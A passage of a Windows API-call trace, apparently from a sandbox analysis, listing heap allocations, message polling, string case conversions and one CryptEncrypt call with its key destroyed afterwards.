Size=0x4) returned 0x24b1848 [0206.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.120] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.120] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.121] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.121] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.121] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.121] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34df940*, pdwDataLen=0x8bef68*=0x16b6c, dwBufLen=0x16b70 | out: pbData=0x34df940*, pdwDataLen=0x8bef68*=0x16b70) returned 1 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0206.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.125] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.126] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.126] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.126] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.127] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.127] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.135] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.135] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.163] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.164] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0206.164] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.165] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0206.165] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.165] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.165] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.165] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.166] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.166] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.166] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.166] CryptDestroyKey (hKey=0xaa5860) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | 